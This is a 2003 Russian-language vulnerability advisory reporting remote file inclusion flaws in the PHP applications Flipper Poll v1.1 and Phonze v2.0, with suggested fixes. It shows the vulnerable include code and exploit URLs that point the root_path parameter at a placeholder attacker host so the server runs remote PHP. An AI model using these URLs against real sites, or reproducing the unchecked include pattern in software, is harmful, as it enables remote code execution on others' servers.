Новые уязвимости.

2003-11-10T00:00:00
ID SECURITYVULNS:DOC:5371
Type securityvulns
Reporter Securityvulns
Modified 2003-11-10T00:00:00

Description

Командой сетевой безопасности LwB Team найдены следующие уязвимости: 1.Произвольный PHP код в Flipper Poll v1.1 URL: http://php.pogoworld.co.uk FILE: poll.php Не проверяется фактическое расположение сценария: config.php , представленного в параметре root_path . Exploit: http://[host]/path/poll.php?root_path=http://[attacker]/ где http://[attacker]/config.php PATH[poll.php]: <?php
$root_path=""; // Путь к папке config.php include_once($root_path . 'config.php'); ... ?> DATE: 8.11.2003

======== 2.Множество уязвимостей в Phonze v2.0 Author: Rory Browne FILE: phpinfo.php Отображение результата функции phpinfo() . FILES: modules/login.mod.php ; modules/main.mod.php Не проверяется фактическое расположение сценариев (modules/.mod.php ; modules/first_main.mod.php) , представленного в параметре root_path . Exploit: http://[host]/path/modules/main.mod.php?root_path=http://[attacker]/ где http://[attacker]/modules/first_main.mod.php FILE: templates/main.tpl Не проверяется фактическое расположение сценария templates/first_main.tpl , представленного в параметре root_path . Exploit: http://[host]/path/templates/main.tpl?root_path=http://[attacker]/ где http://[attacker]/templates/first_main.tpl PATH: Ограничить доступ к phpinfo.php . Установить проверку переменной root_path в каждом, из указанных выше, сценариев. DATE: 9.11.2003

-- LwB Team - Life without Borders www.lwbteam.org vLad aka vlbag _ vlbag@lwbteam.org